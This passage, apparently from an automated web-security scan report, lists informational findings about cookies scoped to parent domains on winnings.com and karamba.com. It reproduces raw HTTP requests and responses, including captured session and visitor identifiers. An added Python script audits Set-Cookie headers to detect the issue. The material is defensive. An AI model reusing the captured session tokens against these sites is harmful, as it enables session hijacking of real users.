Set-Cookie: UniqueVisitorID=0AE4A8ABEB81FBA6A39669E9D12F4EF0; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:41:36 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:41:36 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:41:36 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Vary: Accept-Encoding
Content-Length: 131


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


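The findings in this section all come from the same check: a Set-Cookie header whose Domain attribute names a parent of the host that issued it (here, a cookie issued by www.info.crazyscratch.com but scoped to info.crazyscratch.com, so every present or future host under that parent receives it). The script below re-implements that check as an added example; it is not part of this report or of the scanner that generated it. The sample header block is a constructed, trimmed copy of the 11.120 response above, and the SESSION_NAME_HINTS list is an assumed heuristic for "looks like a session token", which is the distinction the report uses to rate these as Information rather than higher.

```python
"""Flag Set-Cookie headers whose Domain attribute is a parent of the issuing host.

Added example; not code from the report or from the scanner that produced it.
SAMPLE_HEADERS below is a constructed, trimmed copy of finding 11.120.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Assumed heuristic: cookie names containing these fragments are treated as
# session-like. The report's own wording ("does not appear to contain a
# session token") implies a similar name/value heuristic but does not state it.
SESSION_NAME_HINTS = ("sessionid", "session", "sid", "auth", "token")


@dataclass
class CookieFinding:
    name: str
    domain: Optional[str]     # Domain attribute as sent, or None for a host-only cookie
    parent_scoped: bool       # Domain is a proper parent of the issuing host
    http_only: bool
    secure: bool
    looks_like_session: bool


def parse_set_cookie(header_value: str) -> Tuple[str, Dict[str, str]]:
    """Split 'name=value; attr; attr=val' into (name, {attr_lower: value}).

    The value may itself contain '=' and '&' (CSI_28 does); only ';' separates
    attributes, so split on that first and take the first '=' of the first part.
    """
    parts = [p.strip() for p in header_value.split(";")]
    name, _, _value = parts[0].partition("=")
    attrs: Dict[str, str] = {}
    for p in parts[1:]:
        if not p:
            continue
        k, _, v = p.partition("=")
        attrs[k.strip().lower()] = v.strip()
    return name.strip(), attrs


def is_parent_domain(host: str, cookie_domain: str) -> bool:
    """True when cookie_domain is a proper parent of host.

    Uses the RFC 6265 domain-match rule (host ends with '.' + domain) and
    excludes the equal case, which is not parent scoping. A leading dot on the
    Domain attribute is ignored, as browsers do.
    """
    h = host.lower().rstrip(".")
    d = cookie_domain.lower().lstrip(".").rstrip(".")
    return h != d and h.endswith("." + d)


def audit_response(host: str, raw_headers: str) -> List[CookieFinding]:
    """Walk every Set-Cookie line in a raw header block and classify it."""
    findings: List[CookieFinding] = []
    for line in raw_headers.splitlines():
        if not line.lower().startswith("set-cookie:"):
            continue
        name, attrs = parse_set_cookie(line.split(":", 1)[1])
        domain = attrs.get("domain")
        findings.append(CookieFinding(
            name=name,
            domain=domain,
            parent_scoped=domain is not None and is_parent_domain(host, domain),
            http_only="httponly" in attrs,
            secure="secure" in attrs,
            looks_like_session=any(h in name.lower() for h in SESSION_NAME_HINTS),
        ))
    return findings


# Constructed sample: the Set-Cookie lines from finding 11.120, trimmed.
SAMPLE_HOST = "www.info.crazyscratch.com"
SAMPLE_HEADERS = """HTTP/1.1 200 OK
Set-Cookie: ASP.NET_SessionId=4hx2gq45wfk4h4454gql45vw; path=/; HttpOnly
Set-Cookie: CSI_28=EncryptedUniqueVisitorID=0AE4A8ABEB81FBA6A39669E9D12F4EF0&AffiliateID=28; domain=info.crazyscratch.com; expires=Fri, 16-May-2031 11:41:36 GMT; path=/
Set-Cookie: UniqueVisitorID=0AE4A8ABEB81FBA6A39669E9D12F4EF0; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:41:36 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
"""


def parent_scoped_names(host: str = SAMPLE_HOST, headers: str = SAMPLE_HEADERS) -> List[str]:
    """Names of the cookies the scanner would report for this response."""
    return [f.name for f in audit_response(host, headers) if f.parent_scoped]


if __name__ == "__main__":
    for f in audit_response(SAMPLE_HOST, SAMPLE_HEADERS):
        flags = []
        if f.parent_scoped:
            flags.append(f"scoped to parent domain {f.domain}")
        if f.looks_like_session and not f.http_only:
            flags.append("session-like without HttpOnly")
        print(f"{f.name:20} {'; '.join(flags) or 'ok'}")
```

Run against the sample, the three tracking cookies (CSI_28, UniqueVisitorID, CSITemp) are flagged as parent-scoped while ASP.NET_SessionId is not: it carries no Domain attribute, so it is host-only, and it is also the only one marked HttpOnly. That split is why the report rates these findings as Information; the same check against a response that set the session cookie with domain=info.crazyscratch.com would deserve a higher severity, since any host under that parent could then read or overwrite it.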

11.121. http://www.info.winnings.com/visit.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.winnings.com
Path:   /visit.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /visit.aspx?csi=21&par=103122733IP1x10&CurrencyCode=gbp HTTP/1.1
Host: www.info.winnings.com
Proxy-Connection: keep-alive
Referer: http://www.winnings.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[subdomain]=www; winnings[cc]=US; winnings[sessionId]=103122733; winnings[vid]=540129; __utmz=184824495.1305546069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=184824495.1358600567.1305546069.1305546069.1305546069.1; __utmc=184824495; __utmb=184824495.1.10.1305546069

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 11:41:16 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: ASP.NET_SessionId=e0hjummfyxndaxrtiutvr3ma; path=/; HttpOnly
Set-Cookie: CSI_21=EncryptedUniqueVisitorID=A2E7F42BE0B170BFE02AC70E9F96B7C6&AffiliateID=21&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=103122733IP1x10&ProductTypeID=0; domain=info.winnings.com; expires=Fri, 16-May-2031 11:41:16 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=info.winnings.com; expires=Fri, 16-May-2014 11:41:16 GMT; path=/
Set-Cookie: BO=FM; domain=info.winnings.com; expires=Fri, 16-May-2014 11:41:16 GMT; path=/
Set-Cookie: UniqueVisitorID=A2E7F42BE0B170BFE02AC70E9F96B7C6; domain=info.winnings.com; expires=Fri, 16-May-2014 11:41:16 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.winnings.com; expires=Fri, 16-May-2014 11:41:16 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.winnings.com; expires=Fri, 16-May-2014 11:41:16 GMT; path=/
Set-Cookie: CSITemp=21; domain=info.winnings.com; path=/
Vary: Accept-Encoding
Content-Length: 131


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



11.122. http://www.karamba.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:10 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:10 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:10 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:10 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:10 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44654


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.123. http://www.karamba.com/AboutUs.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /AboutUs.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:09 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:09 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:09 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:09 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:09 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47545


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.124. http://www.karamba.com/FairPlay.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /FairPlay.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:48 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:48 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:48 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:48 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:48 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46971


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.125. http://www.karamba.com/Help.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /Help.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Help.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:20 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:20 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:20 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:20 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:20 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46016


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.126. http://www.karamba.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: www.karamba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 11:42:44 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=hnpray55xak3o2u2au4qpubt; path=/; HttpOnly
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=C45936DC0F217E7879AFCCA9E15735D8&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 11:42:44 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 11:42:44 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 11:42:44 GMT; path=/
Set-Cookie: UniqueVisitorID=C45936DC0F217E7879AFCCA9E15735D8; domain=karamba.com; expires=Fri, 16-May-2014 11:42:44 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 11:42:44 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 11:42:44 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Vary: Accept-Encoding
Content-Length: 44654


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.127. http://www.karamba.com/InviteFriend.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /InviteFriend.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:11 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:11 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:11 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:11 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:11 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 57669


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.128. http://www.karamba.com/PlayersClub.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /PlayersClub.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:13 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:13 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:13 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:13 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:13 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54138


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.129. http://www.karamba.com/Privacy.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /Privacy.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Privacy.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:22 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:22 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:22 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:22 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:22 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 56157


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.130. http://www.karamba.com/Promotions.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /Promotions.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:12 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:12 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:12 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:12 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:12 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48406


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.131. http://www.karamba.com/Responsible.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /Responsible.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:31 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:31 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:31 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:31 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:31 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 51857


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.132. http://www.karamba.com/Sitemap.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /Sitemap.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Sitemap.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
